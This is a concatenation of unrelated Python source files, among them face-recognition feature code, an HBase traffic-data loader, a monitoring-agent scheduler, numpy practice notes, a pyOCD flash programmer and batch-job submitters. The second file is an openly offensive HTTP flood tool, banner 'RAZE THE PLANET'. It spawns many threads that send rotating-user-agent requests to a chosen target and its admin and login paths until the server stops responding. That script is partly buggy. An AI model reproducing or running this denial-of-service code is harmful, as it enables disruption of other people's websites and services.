self.model.arg_params["softmax_label"] = mx.nd.empty((1,), self.model.ctx)
exe = self.model.sym.bind(self.model.ctx, self.model.arg_params ,args_grad=None, grad_req="null", aux_states=self.model.aux_params)
exe.forward(is_train=False)
_embedding = exe.outputs[0].asnumpy()
#print(_embedding.shape)
if embedding is None:
embedding = _embedding
else:
embedding += _embedding
if norm:
embedding = sklearn.preprocessing.normalize(embedding)
return embedding
def get_feature(self, face_img, norm=True):
#aligned_face = self.get_aligned_face(img, force)
#if aligned_face is None:
# return None
return self.get_feature_impl(face_img, norm)
def is_same_id(self, source_img, target_img_list):
source_face = self.get_aligned_face(source_img, True)
print('source face', source_face.shape)
target_face_list = []
pp = 0
for img in target_img_list:
target_force = False
if pp==len(target_img_list)-1 and len(target_face_list)==0:
target_force = True
target_face = self.get_aligned_face(img, target_force)
if target_face is not None:
target_face_list.append(target_face)
pp+=1
print('target face', len(target_face_list))
source_feature = self.get_feature(source_face, True)
target_feature = None
for target_face in target_face_list:
_feature = self.get_feature(target_face, False)
if target_feature is None:
target_feature = _feature
else:
target_feature += _feature
target_feature = sklearn.preprocessing.normalize(target_feature)
#sim = np.dot(source_feature, target_feature.T)
diff = np.subtract(source_feature, target_feature)
dist = np.sum(np.square(diff),1)
print('dist', dist)
#print(sim, dist)
if dist<=self.threshold:
return True
else:
return False
def sim(self, source_img, target_img_list):
print('sim start')
source_face = self.get_aligned_face(source_img, True)
print('source face', source_face.shape)
target_face_list = []
pp = 0
for img in target_img_list:
target_force = False
if pp==len(target_img_list)-1 and len(target_face_list)==0:
target_force = True
target_face = self.get_aligned_face(img, target_force)
if target_face is not None:
target_face_list.append(target_face)
pp+=1
print('target face', len(target_face_list))
source_feature = self.get_feature(source_face, True)
target_feature = None
sim_list = []
for target_face in target_face_list:
_feature = self.get_feature(target_face, True)
_sim = np.dot(source_feature, _feature.T)
sim_list.append(_sim)
return np.max(sim_list)
|
import requests
import threading
import socket
import time
import random
import sys
global target
global server_block
global end_
end_ = False #method to stop threads
def load_pix():
from colorama import init
init()
from colorama import Fore, Back, Style
print(Fore.GREEN + """
|||} || ||||||| ||||||||||
|| |} | | || ||
|| |} || || || ||
|||} |||||||| || ||||||||
||\\\ || || || ||
|| \\\ || || || ||
|| \\\ || || ||||||| ||||||||||
RAZE THE PLANET
---------------
Target = %s
Power = %s
""") % (target,power)
print(Style.RESET_ALL)
if len(sys.argv) == 3:
if sys.argv[1] is None:
print "No target specified"
exit()
else:
target=str(sys.argv[1])
#print ("Target = %s") % (target)
if sys.argv[2] is None:
print "No power specified"
exit()
else:
power=int(sys.argv[2])
#print ("Power = %s") % (power)
elif len(sys.argv) ==4:
if sys.argv[1] is None:
print "No target specified"
exit()
else:
target=str(sys.argv[1])
#print ("Target = %s") % (target)
if sys.argv[2] is None:
print "No power specified"
exit()
else:
power=int(sys.argv[2])
#print ("Power = %s") % (power)
if sys.argv[3] is None:
print "Invalid option"
exit()
elif sys.argv[3]=='-ad':
ad_da = True
else:
ad_da = False
else:
print "invalid argument size"
def user_agent():
global uagent
uagent=[]
uagent.append("Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14")
uagent.append("Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:26.0) Gecko/20100101 Firefox/26.0")
uagent.append("Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")
uagent.append("Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1")
return(uagent)
def camo():
global adaptive_data
adaptive_data = []
adaptive_data.append("file")
adaptive_data.append("admin")
adaptive_data.append("login")
adaptive_data.append("help")
adaptive_data.append("info")
adaptive_data.append("about")
adaptive_data.append("logins")
adaptive_data.append("HELP")
adaptive_data.append("account")
adaptive_data.append("text")
adaptive_data.append("administrator")
adaptive_data.append("Url")
adaptive_data.append("Support")
adaptive_data.append("support")
adaptive_data.append("Admin")
adaptive_data.append("Contact")
adaptive_data.append("contact")
return adaptive_data
camo()
user_agent()
def test():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
global server_block
server_block = False
while True:
try:
s.connect((target,80))
time.sleep(5)
except:
server_block = True
break
def reg_attack():
while server_block == False and end_ == False:
try:
tar = ('http://%s') % (target)
req = requests.get(tar, headers=random.choice(uagent))
except KeyboardInterrupt:
print "Stopping attack"
break
def attack1():
while server_block == False and end_ == False:
try:
tar = ('http://%s/%s') % (target,random.choice(adaptive_data))
req = requests.get(tar, headers=random.choice(uagent))
except KeyboardInterrupt:
print "Stopping attack"
break
try:
test()
print "Started testing service"
if ad_da = True:
for i in range(0,power):
t = threading.Thread(target=attack1)
t.start()
print ("Started user %s") % (i+1)
else:
for i in range(0,power):
t = threading.Thread(target=reg_attack)
t.start()
print ("Started user %s") % (i+1)
except:
print "error!"
exit()
print "Attack is underway!"
def end_test():
try:
pass
except KeyboardInterrupt:
end_ = True
end_test()
|
### Parte de leer los datos de hdfs ###
import pandas as pd
import numpy as np
import pydoop.hdfs as hd
from lxml import objectify
with hd.open("/user/datostrafico/20160526_1711.xml") as archivo:
parsed = objectify.parse(archivo)
DatosTrafico = parsed.getroot()
totalvehiculostunel = 0;
totalvehiculoscalle30 = 0;
velocidadmediatunel = 0;
velocidadmediasuperficie = 0;
iteraccion = 0
for row in DatosTrafico.DatoGlobal:
if (row.Nombre == 'totalVehiculosTunel'):
totalvehiculostunel = row.VALOR
if (row.Nombre == 'totalVehiculosCalle30'):
totalvehiculoscalle30 = row.VALOR
if (row.Nombre == 'velocidadMediaTunel'):
velocidadmediatunel = row.VALOR
if (row.Nombre == 'velicidadMediaSuperfice'):
velocidadmediasuperficie = row.VALOR
iteraccion = iteraccion + 1
fila = [str(totalvehiculostunel),str(totalvehiculoscalle30),str(velocidadmediasuperficie),str(velocidadmediatunel)]
### Parte de meter los datos en hbase con el conector ###
import csv
import happybase
import time
batch_size = 1000
#host = "192.168.1.108"
host = 'localhost'
namespace = "calidadaire"
row_count = 0
start_time = time.time()
table_name = "medicion_trafico"
def connect_to_hbase():
""" Connect to HBase server.
This will use the host, namespace, table name, and batch size as defined in
the global variables above.
"""
conn = happybase.Connection(host = host,
table_prefix = namespace,
table_prefix_separator = ":")
conn.open()
table = conn.table(table_name)
batch = table.batch(batch_size = batch_size)
return conn, batch
def insert_row(batch, row):
""" Insert a row into HBase.
Write the row to the batch. When the batch size is reached, rows will be
sent to the database.
Rows have the following schema:
[ total_vehiculos_tunel:0-23,total_vehiculos_calle30:0-23,
velocidad_media_superficie:0-23,velocidad_media_tunel:0-23 ]
"""
batch.put("20160621",{"total_vehiculos_tunel:0":row[0],"total_vehiculos_calle30:0":row[1],"velocidad_media_superficie:0":row[2],"velocidad_media_tunel:0":row[3]})
# After everything has been defined, run the script.
conn, batch = connect_to_hbase()
# print "Connect to HBase. table name: %s, batch size: %i" % (table_name, batch_size)
try:
insert_row(batch, fila)
batch.send()
finally:
# No matter what happens, close the file handle.
conn.close()
|
# coding=utf-8
from AutoInstall import *
from threading import Thread
from Manage import JobsManage
import HttpAPI
from apscheduler.schedulers.blocking import BlockingScheduler
from apscheduler.triggers import interval
from config import log_File, PLUGIN, base_leve, HTTP
from BaseMetric import collect
from Repo import report
Jobs = BlockingScheduler()
thread_log = logging.getLogger(u'计划任务调度器')
thread_log.setLevel(base_leve)
thread_log.propagate = False
thread_log.addHandler(log_File)
# thread_log.addHandler(console)
Plugins = JobsManage(PLUGIN)
Plugins.make_jobs()
@Jobs.scheduled_job(trigger='interval', id='UpdataThread', minutes=5)
def UpdataThread():
"""
更新线程,每5分钟执行一次,会对比md5.txt是否与服务器上的md5.txt里一致。
:return:
"""
server_md5 = None
ins = Upgrade()
try:
server_md5 = ins.Remote_Md5()
file_md5 = ins.File_Md5()
if file_md5 == server_md5:
return thread_log.info(u"Md5验证通过,跳过更新! ")
except urllib2.HTTPError:
thread_log.error(u"无法连接到: %s" % ins.AgentMd5)
t = Thread(target=ins.Download_And_Install, args=(server_md5,), name=u'更新线程')
thread_log.info(u'%s--%s' % (t.name, t.ident))
t.daemon = True
t.start()
def APIthread():
"""
API接口线程,方便用户自己通过调用接口来提交数据。
:return:
"""
ports = HTTP.get('listen')
if ports:
t = Thread(target=HttpAPI.app.run, kwargs=dict(port=ports), name=u'API接口线程')
thread_log.info(u'%s--%s' % (t.name, t.ident))
t.daemon = True
t.start()
else:
return thread_log.error(u"端口错误,无法开启API传送数据!")
@Jobs.scheduled_job(trigger='interval', id='BaseMetric', minutes=1)
def BasePush():
"""
基础数据提交线程,每一分钟自动执行collect()函数来获取metric,并提交到服务器
:return:
"""
try:
collect()
except Exception as err:
thread_log.error(err)
return
@Jobs.scheduled_job(trigger='interval', id='HbsRepo', minutes=1)
def RepoPush():
"""
HBS提交线程
:return:
"""
return report()
|
import subprocess
from zombie.window_operation import Window
class Program:
def __init__(self, program_path):
self.path = program_path
def run(self):
subprocess.Popen(self.path)
if __name__ == "__main__":
pg = Program("explorer.exe")
pg.run()
mes_main_window = Window("Github")
mes_main_window.list_all_windows(printout=True)
|
'''
Created on 2013-7-19
@author: Administrator
'''
import framework.model.DAO as DAO;
dal = DAO.DAO();
#sql = "delete from user where id=13";
result = dal.delete({'id':13});
print result |
# !/usr/bin/python
# -*- coding:utf8 -*-
# __author__ = c08762
"""learn numpy"""
# 基本属性
import numpy as np
# array = np.array([[1,2,3],[4,5,6]])
# print(array)
# print('number of dim(维数):', array.ndim)
# print('shape:', array.shape)
# print('size:', array.size)
# 创建矩阵,可指定矩阵type, 默认为64位
a1 = np.array([2,3,4])
a2 = np.array([[2,3,4],[5,6,7]], dtype=np.int)
# 生成矩阵
a3 = np.zeros((3,4)) # 全0矩阵,参数为shape
a4 = np.ones((5,6), dtype=np.int) # 全1矩阵
a5 = np.empty((2,2)) # 空矩阵,实际为近0值填充
# 生成有序矩阵
a6 = np.arange(10,20) # 生成10-19的一维矩阵(数组),可指定步长
a7 = np.arange(12).reshape((3,4)) # 指定shape
# 生成线段,包含首尾共n段,段距为(尾-首)/(n-1)
a8 = np.linspace(1,51,6)
a9 = np.linspace(1,51,6).reshape((3,2))
# 生成随机矩阵
a14 = np.random.random_integers(1,20,(3,2))
a15 = np.random.random((2,3)) # 指定shape
# print(a1)
# print(a2.dtype)
# print(a3)
# print(a4)
# print(a5)
# print(a6)
# print(a7)
# print(a8)
# print(a9)
# print(a14)
# print(a15)
# numpy支持的计算
a10 = np.array([10,20,30,40])
a11 = np.arange(4)
# print(a10+a11) # 加减乘除法对应元素进行相应运算
# print(a10-a11)
# print(a10*a11)
# print(a11/a10)
# print(a10*2) # 数乘:乘以每个元素
# 对矩阵中的值进行判断,返回bool值
# print(a11,a11<3)
# 矩阵乘法
# a12 = np.array([[1,2,3],[4,5,6]])
# a13 = np.array([[1,2],[3,4],[5,6]])
# print(a12)
# print(a13)
# print(np.dot(a12,a13)) # 与下面的表达式等价
# print(a12.dot(a13))
# print(np.sum(a15)) # 对整个矩阵求和
# print(np.min(a15)) # 求最小值
# print(np.max(a15)) # 求最大值
# print(np.sum(a15,axis=1)) # axis=1 按行求和,求最值
# print(np.min(a15,axis=0)) # axis=0 按列求和,求最值
# print(np.argmin(a15)) # 最小值的索引,从0开始,先行后列
# print(np.argmax(a15)) # 最大值的索引,base 0
# print(np.mean(a15)) # 平均值
# print(a15.mean()) # 平均值
# print(np.average(a15)) # 平均值
# print(np.median(a15)) # 中位数
print(a2)
# print(np.cumsum(a2)) #
# print(np.diff(a2))
# print(np.nonzero(a2))
# print(np.sort(a2)) # 逐行排序
# print(np.transpose(a2)) # 转置
# print(a2.transpose()) # 转置
#print(a2.T) # 转置
print(np.clip(a2,4,5)) # <min置为min,>max置为max
|
class ResponseGenerator:
def __init__(self):
pass
@classmethod
def make_response(cls, clientRequest, selectedTemplate, params=None, training={}):
print("* * * * * * * * * * * * * * ")
print("# Make Response ")
if params:
clientRequest["response"]["responseText"] = selectedTemplate["text"].format(
**params)
else:
clientRequest["response"]["responseText"] = selectedTemplate["text"]
if clientRequest["response"].get("search"):
_options = get_options(clientRequest["response"]["search"])
clientRequest["response"]["options"] = _options
else:
clientRequest["response"]["options"] = selectedTemplate["options"]
clientRequest["training"] = training
return clientRequest
@classmethod
def send_home_response(cls, clientRequest, home_options):
print("* * * * * * * * * * * * * * ")
print("# Make Home Response")
clientRequest["response"]["responseText"] = "Do you need assistance with"
clientRequest["response"]["options"] = home_options
clientRequest["response"]["search"] = []
return clientRequest
def get_options(searchPath):
return ""
|
from numpy import*
m = array(eval(input("Vetor da media:")))
s = m**(-1)
s1 = sum(s)
n = size(m)
ss = (s1/n)**(-1)
print(round(ss,2))
|
import nltk
from nltk.stem.porter import PorterStemmer
from nltk.stem.lancaster import LancasterStemmer
def pos_tag(tokens):
nltk.download('averaged_perceptron_tagger')
tagged = nltk.pos_tag(tokens)
print(tagged)
def tokenize(sentence):
global tokens
nltk.download('punkt')
tokens = nltk.word_tokenize(sentence)
print(tokens)
return tokens
def stem(tokens):
porter_stemmer = PorterStemmer()
for i in tokens:
print(porter_stemmer.stem(i))
def stem2(tokens):
lancaster_stemmer = LancasterStemmer()
for i in tokens:
print(lancaster_stemmer.stem(i))
# debug configuration parameters for different tasks
#
# count tf-idf values
# -l -c tfidf -output data/tfIdfResults.xml
#
# learn by tfIdf
# -l -c tfidfLearning -input data/tfIdfResults.xml
#
# classification by tf-idf
# -l -c tfidfClassification -input data/tfIdfResults.xml
|
# coding=UTF-8
from django.conf import settings
def context_processor(request):
return {'CONTACT_LINK': settings.CONTACT_LINK}
|
"""
Copyright (c) 2019 Cypress Semiconductor Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import json
from cysecuretools.execute.programmer.base import ProgrammerBase, ResetType
from pyocd.core.helpers import ConnectHelper
from pyocd.core import exceptions
from pyocd.flash import loader
from pyocd.flash.loader import FlashEraser
from pyocd import coresight
from cysecuretools.execute.programmer.exceptions import ExtendedTransferFaultError
TARGET_MAP = os.path.join(os.path.dirname(__file__), 'pyocd_target_map.json')
class Pyocd(ProgrammerBase):
def __init__(self):
super(Pyocd, self).__init__()
self.session = None
self.board = None
self.target = None
self.probe = None
def connect(self, target_name=None, interface=None, probe_id=None):
"""
Connects to target using default debug interface.
:param target_name: The target name.
:param interface: Debug interface.
:param probe_id: Probe serial number.
:return: True if connected successfully, otherwise False.
"""
if interface:
raise NotImplementedError
else:
if target_name:
# Search for device in target map
with open(TARGET_MAP) as f:
file_content = f.read()
json_data = json.loads(file_content)
for json_target in json_data:
if target_name.lower().strip() == json_target.lower().strip():
target_name = json_data[json_target]
break
options = {
'target_override': target_name
}
else:
options = {}
self.session = ConnectHelper.session_with_chosen_probe(blocking=True, options=options, board_id=probe_id,
unique_id=probe_id)
if self.session is None:
return False
self.board = self.session.board
self.session.open()
self.target = self.board.target
self.probe = self.session.probe
# Write infinite loop into RAM and start core execution
self.halt()
# B662 - CPSIE I - Enable IRQ by clearing PRIMASK
# E7FE - B - Jump to address (argument is an offset)
self.write32(0x08000000, 0xE7FEB662)
self.write_reg('pc', 0x08000000)
self.write_reg('sp', 0x08001000)
self.write_reg('xpsr', 0x01000000)
self.resume()
return True
def disconnect(self):
"""
Closes active connection.
"""
if self.session is None:
raise ValueError('Debug session is not initialized.')
self.session.close()
def set_frequency(self, value_khz):
"""
Sets probe frequency.
:param value_khz: Frequency in kHz.
"""
if self.probe is None:
raise ValueError('Debug probe is not initialized.')
self.probe.set_clock(value_khz * 1000)
def halt(self):
"""
Halts the target.
"""
if self.session is None:
raise ValueError('Debug session is not initialized.')
self.target.halt()
def resume(self):
"""
Resumes the execution
"""
if self.target is None:
raise ValueError('Target is not initialized.')
self.target.resume()
def reset(self, reset_type=ResetType.SW):
"""
Resets the target.
:param reset_type: The reset type.
"""
if self.target is None:
raise ValueError('Target is not initialized.')
self.target.reset(reset_type=reset_type)
def reset_and_halt(self, reset_type=ResetType.SW):
"""
Resets the target and halts the CPU immediately after reset.
:param reset_type: The reset type.
"""
if self.target is None:
raise ValueError('Target is not initialized.')
self.target.reset_and_halt(reset_type=reset_type)
def read8(self, address):
"""
Reads 8-bit value from specified memory location.
:param address: The memory address to read.
:return: The read value.
"""
if self.target is None:
raise ValueError('Target is not initialized.')
try:
data = self.target.read_memory(address, transfer_size=8)
except exceptions.TransferFaultError as e:
raise ExtendedTransferFaultError(e.fault_address, e.fault_length)
return data
def read16(self, address):
"""
Reads 16-bit value from specified memory location.
:param address: The memory address to read.
:return: The read value.
"""
if self.target is None:
raise ValueError('Target is not initialized.')
if (address & 0x01) == 0:
try:
data = self.target.read_memory(address, transfer_size=16)
except exceptions.TransferFaultError as e:
raise ExtendedTransferFaultError(e.fault_address, e.fault_length)
return data
else:
raise ValueError('Address not aligned.')
def read32(self, address):
"""
Reads 32-bit value from specified memory location.
:param address: The memory address to read.
:return: The read value.
"""
if self.target is None:
raise ValueError('Target is not initialized.')
if (address & 0x03) == 0:
try:
data = self.target.read_memory(address, transfer_size=32)
except exceptions.TransferFaultError as e:
raise ExtendedTransferFaultError(e.fault_address, e.fault_length)
return data
else:
raise ValueError('Address not aligned.')
def write8(self, address, value):
"""
Writes 8-bit value by specified memory location.
:param address: The memory address to write.
:param value: The 8-bit value to write.
"""
if self.target is None:
raise ValueError('Target is not initialized.')
try:
data = self.target.write_memory(address, value, transfer_size=8)
except exceptions.TransferFaultError as e:
raise ExtendedTransferFaultError(e.fault_address, e.fault_length)
return data
def write16(self, address, value):
"""
Writes 16-bit value by specified memory location.
:param address: The memory address to write.
:param value: The 16-bit value to write.
"""
if self.target is None:
raise ValueError('Target is not initialized.')
try:
data = self.target.write_memory(address, value, transfer_size=16)
except exceptions.TransferFaultError as e:
raise ExtendedTransferFaultError(e.fault_address, e.fault_length)
return data
def write32(self, address, value):
"""
Writes 32-bit value by specified memory location.
:param address: The memory address to write.
:param value: The 32-bit value to write.
"""
if self.target is None:
raise ValueError('Target is not initialized.')
try:
data = self.target.write_memory(address, value, transfer_size=32)
except exceptions.TransferFaultError as e:
raise ExtendedTransferFaultError(e.fault_address, e.fault_length)
return data
def read_reg(self, reg_name):
"""
Gets value of a core register.
:param reg_name: Core register name.
:return: The register value.
"""
reg = reg_name.lower()
if reg in coresight.cortex_m.CORE_REGISTER:
value = self.target.read_core_register(reg)
return value
else:
raise ValueError(f'Unknown core register {reg}.')
def write_reg(self, reg_name, value):
"""
Sets value of a core register.
:param reg_name: Core register name.
:param value: The value to set.
:return: The register value.
"""
reg = reg_name.lower()
if reg in coresight.cortex_m.CORE_REGISTER:
self.target.write_core_register(reg, value)
else:
raise ValueError(f'Unknown core register {reg}.')
def erase(self, address, size):
"""
Erases entire device flash or specified sectors.
:param address: The memory location.
:param size: The memory size.
"""
region = self.session.target.memory_map.get_region_for_address(address)
if not region:
raise ValueError('Address 0x%08x is not within a memory region.' % address)
if not region.is_flash:
raise ValueError('Address 0x%08x is not in flash.' % address)
eraser = FlashEraser(self.session, FlashEraser.Mode.SECTOR)
address_range = f"{hex(address)}-{hex(address + size)}"
eraser.erase([address_range])
def program(self, filename, file_format=None, address=None):
"""
Programs a file into flash.
:param filename: Path to a file.
:param file_format: File format. Default is to use the file's extension.
:param address: Base address used for the address where to flash a binary.
:return: True if programmed successfully, otherwise False.
"""
if self.session is None:
raise ValueError('Debug session is not initialized.')
programmer = loader.FileProgrammer(self.session, chip_erase='sector')
programmer.program(filename, base_address=address, file_format=file_format)
|
# -*- coding: utf-8 -*-
# ex: set sts=4 ts=4 sw=4 noet:
# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
#
# See COPYING file distributed along with the reproman package for the
# copyright and license terms.
#
# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
"""Submitters for `reproman run`.
"""
import abc
import collections
from functools import wraps
import json
import logging
import re
import time
from reproman.cmd import CommandError
from reproman.dochelpers import borrowdoc
lgr = logging.getLogger("reproman.support.jobs.submitters")
def assert_submission_id(method):
"""Decorate `method` to guard against unset submission ID.
"""
@wraps(method)
def wrapped(self, *args, **kwds):
if not self.submission_id:
lgr.warning("Cannot check status without a submission ID")
return "unknown", None
return method(self, *args, **kwds)
return wrapped
class Submitter(object, metaclass=abc.ABCMeta):
"""Base Submitter class.
A submitter is responsible for submitting a command on a resource (e.g., to
a batch system).
"""
def __init__(self, session):
self.session = session
self.submission_id = None
@abc.abstractproperty
def submit_command(self):
"""A list the defines the command used to submit the job.
"""
def submit(self, script, submit_command=None):
"""Submit `script`.
Parameters
----------
script : str
Submission script.
submit_command : list or None, optional
If specified, use this instead of `.submit_command`.
Returns
-------
submission ID (str) or, if one can't be determined, None.
"""
lgr.info("Submitting %s", script)
out, _ = self.session.execute_command(
(submit_command or self.submit_command) + [script])
subm_id = out.rstrip()
if subm_id:
self.submission_id = subm_id
return subm_id
@abc.abstractproperty
def status(self):
"""Return the status of a submitted job.
The return value is a tuple where the first item is a restricted set of
values that the submitter uses to decide what to do. Valid values are
'waiting', 'completed', and 'unknown'.
The second item should be the status as reported by the batch system or
None of one could not be determined.
"""
def follow(self):
"""Follow submitted command, exiting once it is finished.
"""
while True:
our_status, their_status = self.status
if our_status != "waiting":
if their_status:
lgr.info("Final state of job %s: %s",
self.submission_id, their_status)
break
lgr.info("Waiting on job %s: %s",
self.submission_id, their_status)
time.sleep(10) # TODO: pull out/make configurable
class PbsSubmitter(Submitter):
"""Submit a PBS job.
"""
name = "pbs"
def __init__(self, session):
super(PbsSubmitter, self).__init__(session)
@property
@borrowdoc(Submitter)
def submit_command(self):
return ["qsub"]
@property
@assert_submission_id
@borrowdoc(Submitter)
def status(self):
# FIXME: One problem is that Torque PBS may not represent the array
# consistently between versions (or perhaps configuration?). One system
# I try has [] in the name and allows qstat querying of the commands as
# a whole, while the other explodes them all out into individual jobs
# with no way AFAICS to query individual jobs. Going through DRMAA
# might help in many cases (and is probably something we should
# provide), but it's not a complete solution because a PBS system we
# want to support doesn't have DRMAA support.
# FIXME: Is there a reliable, long-lived way to see a job after it's
# completed? (tracejob can fail with permission issues.)
try:
stat_out, _ = self.session.execute_command(
"qstat -f {}".format(self.submission_id))
except CommandError:
return "unknown", None
match = re.search(r"job_state = ([A-Z])", stat_out)
if not match:
lgr.warning("No job status match found in %s", stat_out)
return "unknown", None
job_state = match.group(1)
if job_state in ["R", "E", "H", "Q", "W"]:
our_state = "waiting"
elif job_state == "C":
our_state = "completed"
else:
our_state = "unknown"
return our_state, job_state
class CondorSubmitter(Submitter):
"""Submit a HTCondor job.
"""
name = "condor"
def __init__(self, session):
super(CondorSubmitter, self).__init__(session)
self._status_method = self._status_json
@property
@borrowdoc(Submitter)
def submit_command(self):
return ["condor_submit", "-terse"]
@borrowdoc(Submitter)
def submit(self, script, submit_command=None):
# Discard return value, which isn't submission ID for the current
# condor_submit form.
out = super(CondorSubmitter, self).submit(script, submit_command)
# Output example (3 subjobs): 199.0 - 199.2
job_id = out.strip().split(" - ")[0].split(".")[0]
self.submission_id = job_id
return job_id
@property
@assert_submission_id
@borrowdoc(Submitter)
def status(self):
try:
st = self._status_method()
except CommandError:
if self._status_method.__name__ == "_status_json":
lgr.debug("condor_q -json failed. Trying another method.")
self._status_method = self._status_no_json
st = self._status_method()
else:
st = "unknown", None
return st
def _status_json(self):
stat_out, _ = self.session.execute_command(
"condor_q -json {}".format(self.submission_id))
if not stat_out.strip():
lgr.debug("Status output for %s empty", self.submission_id)
return "unknown", None
stat_json = json.loads(stat_out)
# http://pages.cs.wisc.edu/~adesmet/status.html
condor_states = {0: "unexpanded",
1: "idle",
2: "running",
3: "removed",
4: "completed",
5: "held",
6: "submission error"}
codes = [sj.get("JobStatus") for sj in stat_json]
waiting_states = [0, 1, 2, 5]
if any(c in waiting_states for c in codes):
our_status = "waiting"
elif all(c == 4 for c in codes):
our_status = "completed"
else:
our_status = "unknown"
# FIXME: their status should represent all subjobs, but right now we're
# just taking the first code.
return our_status, condor_states.get(codes[0])
def _status_no_json(self):
"""Unclever status for older condor versions without 'condor_q -json'.
"""
# Parse the trailing:
# 0 jobs; 0 completed, 0 removed, 0 idle, 0 running, 0 held, 0 suspended
stat_out, _ = self.session.execute_command(
"condor_q {}".format(self.submission_id))
last_line = stat_out.strip().splitlines()[-1]
ours, theirs = "unknown", None
match_njobs = re.match(r"([1-9][0-9]*) jobs;", last_line.strip())
if match_njobs:
njobs = int(match_njobs.group(1))
# Try to match our json matching above. This leaves some out from
# both lists. I don't know what the exact map is.
to_ours = [(r"[1-9][0-9]* (idle|running|held)", "waiting"),
(r"[1-9][0-9]* (removed)", "unknown"),
# Only consider completed if we don't have a hit for
# anything else and its number matches the total
# reported number of jobs.
(r"{} (completed)".format(njobs), "completed")]
for regexp, ours_ in to_ours:
match_stat = re.search(regexp, last_line)
if match_stat:
theirs = match_stat.group(1)
ours = ours_
break
# FIXME: their status should represent all subjobs, but right now we're
# just taking the first hit from the list above.
return ours, theirs
class LocalSubmitter(Submitter):
"""Submit a local job.
"""
name = "local"
def __init__(self, session):
super(LocalSubmitter, self).__init__(session)
@property
@borrowdoc(Submitter)
def submit_command(self):
return ["sh"]
@borrowdoc(Submitter)
def submit(self, script, submit_command=None):
out = super(LocalSubmitter, self).submit(script, submit_command)
pid = None
if out:
pid = out.strip() or None
self.submission_id = pid
return pid
@property
@assert_submission_id
@borrowdoc(Submitter)
def status(self):
try:
out, _ = self.session.execute_command(
["ps", "-o", "pid=", "-p", self.submission_id])
except CommandError:
return "unknown", None
if out.strip():
status = "waiting", "running"
else:
status = "completed", "completed"
return status
SUBMITTERS = collections.OrderedDict(
(o.name, o) for o in [
PbsSubmitter,
CondorSubmitter,
LocalSubmitter,
]
)
|
import os
class RecursiveImporterUtilities(object):
@staticmethod
def getDirCSVFiles(directory, verbose=True):
csvFileList = []
if (verbose):
print "\r\nGetting CSV files\r\n-----------"
#note: directory is a QString -> must be converted
for root, dirs, fileNames in os.walk(str(directory)):
for fileName in fileNames:
fileBase, fileExt = os.path.splitext(fileName)
if (fileExt == ".csv"):
fullPath = os.path.join(root, fileName)
csvFileList.append(fullPath)
if (verbose == True):
print "CSV File Search Found: " + fullPath
if ((verbose == True) & (csvFileList == [])):
print "CSV File Search Found: no files"
print "\r\n"
return csvFileList
|
# Generated by Django 2.0.1 on 2018-05-09 16:06
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('api', '0011_task_status'),
]
operations = [
migrations.AlterField(
model_name='task',
name='status',
field=models.IntegerField(default=0),
),
]
|
from methods import get_order, train_model
# get list
overall_list, _ = get_order()
# set i to the number of mosaics -1
num = 0
i = 21
# start model training with number of repetitions
# set all parameters
for num in range(5):
print("On repetition ", num)
train_model(train_path=overall_list[i], extra_path=overall_list[24],
val_path="/home/s6nocrem/project/croptypes/csv/mosaics_validation/mosaics_validation_ssh.csv",
dataset_size=len(overall_list[i]), dataset_number=i+1, repetition=num, net="VGG", num_classes=5, batch_size=100, epochs=10, mode='other')
|
from getpass import getpass
from ncclient.transport.errors import AuthenticationError
from paramiko import AuthenticationException
from django.conf import settings
from django.core.management.base import BaseCommand, CommandError
from django.db import transaction
from dcim.models import Device, Module, Site
class Command(BaseCommand):
help = "Update inventory information for specified devices"
username = settings.NETBOX_USERNAME
password = settings.NETBOX_PASSWORD
def add_arguments(self, parser):
parser.add_argument('-u', '--username', dest='username', help="Specify the username to use")
parser.add_argument('-p', '--password', action='store_true', default=False, help="Prompt for password to use")
parser.add_argument('-s', '--site', dest='site', action='append',
help="Filter devices by site (include argument once per site)")
parser.add_argument('-n', '--name', dest='name', help="Filter devices by name (regular expression)")
parser.add_argument('--full', action='store_true', default=False, help="For inventory update for all devices")
parser.add_argument('--fake', action='store_true', default=False, help="Do not actually update database")
def handle(self, *args, **options):
def create_modules(modules, parent=None):
for module in modules:
m = Module(device=device, parent=parent, name=module['name'], part_id=module['part_id'],
serial=module['serial'], discovered=True)
m.save()
create_modules(module.get('modules', []), parent=m)
# Credentials
if options['username']:
self.username = options['username']
if options['password']:
self.password = getpass("Password: ")
# Attempt to inventory only active devices
device_list = Device.objects.filter(status=True)
# --site: Include only devices belonging to specified site(s)
if options['site']:
sites = Site.objects.filter(slug__in=options['site'])
if sites:
site_names = [s.name for s in sites]
self.stdout.write("Running inventory for these sites: {}".format(', '.join(site_names)))
else:
raise CommandError("One or more sites specified but none found.")
device_list = device_list.filter(rack__site__in=sites)
# --name: Filter devices by name matching a regex
if options['name']:
device_list = device_list.filter(name__iregex=options['name'])
# --full: Gather inventory data for *all* devices
if options['full']:
self.stdout.write("WARNING: Running inventory for all devices! Prior data will be overwritten. (--full)")
# --fake: Gathering data but not updating the database
if options['fake']:
self.stdout.write("WARNING: Inventory data will not be saved! (--fake)")
device_count = device_list.count()
self.stdout.write("** Found {} devices...".format(device_count))
